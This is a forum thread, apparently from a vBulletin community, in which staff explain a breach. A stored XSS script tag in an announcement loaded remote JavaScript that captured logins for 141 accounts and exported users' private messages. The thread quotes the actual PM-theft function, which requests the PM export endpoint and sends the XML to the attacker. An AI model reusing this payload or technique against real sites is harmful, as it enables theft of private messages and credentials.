The logs have been double checked. The compromised mod account has no activity for global announcements predating yesterday. And as far as we're aware no other mod accounts were compromised.We're looking into the logs to double-check.
All of the 141 were reset yesterday morning. I'm not quite sure what you mean by "fixed" beyond that.How many of the 141 are fixed?
It took a whole day and multiple requests for me.
How many of the 141 are fixed?
It took a whole day and multiple requests for me.
My account is still locked, had to create a duplicate for the time being just to get PM access....
hope I can get this resolved soon
YGPM. Help is on the way.
Harvey
Senior AT Mod/Admin
Yes.I had to reset my password. So, was my account one of the ones compromised?
The script was hosted on a 3rd party server. There was a Javascript <script> tag in the title of the announcement, and as HTML was turned on for that announcement, the tag was not escaped and dutifully executed by clients. This is a stock feature of vB.A better question might be, how does a Mod account, have enough priviledges to create a script, that runs for everyone logged in, and not even having to view the announcement to run the script
The PMs weren't stolen by going through mod accounts. They were stolen by the script executing on client computers, which in turn triggered the PM export option for the user's account and then piped the output of that to the remote server.*not to mention, how do Mod accounts (and not Admin) accounts, have privs to read our PMs anyways?
I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact, not "private"?
And that some remote hacker did just that, and sucked up all of our PMs to some remote server?
We'll have to see what vB 5 brings us.How long until Mod accounts (and higher) require two-factor authentication? (RSA key fobs, cell-phone callbacks, or fingerprint or other biometric authentication devices?)
function getMessages() {
	$.get(PATH_FORUM + '../private.php?do=downloadpm&dowhat=xml', function(data) {
		request({ type: TYPE_USER, messages: escape((new XMLSerializer()).serializeToString(data)) });
	});
}The PMs weren't stolen by going through mod accounts. They were stolen by the script executing on client computers, which in turn triggered the PM export option for the user's account and then piped the output of that to the remote server.*
*The PM theft code in questionCode:function getMessages() { $.get(PATH_FORUM + '../private.php?do=downloadpm&dowhat=xml', function(data) { request({ type: TYPE_USER, messages: escape((new XMLSerializer()).serializeToString(data)) }); }); }
I thought when Mosh was banned, they claimed that Mods hacked their account to read their PMs. So this breach announcement is telling us that any Mod account can simply read our PMs, that they are in fact, not "private"?
And that some remote hacker did just that, and sucked up all of our PMs to some remote server?
It wasn't a DB hack, it was an XSS hack. They didn't touch our DB; passwords were exposed by embedding a XSS that copied down users credentials as they entered them to log in. Which is why only 141 accounts were compromised.Were the passwords hashed or anything when taken? Or should be assume it was unencrypted when it was compromised? I changed my password anyways, but just curious regarding future security precautions...
They're exported as XML files and downloaded to the remote server. At which point the attacker can read them.Why would they take PMs if the only people who can read them are the owners?
Why would they take PMs if the only people who can read them are the owners?
They're exported as XML files and downloaded to the remote server. At which point the attacker can read them.Exactly.
It wasn't a DB hack, it was an XSS hack. They didn't touch our DB; passwords were exposed by embedding a XSS that copied down users credentials as they entered them to log in. Which is why only 141 accounts were compromised.

 
				
		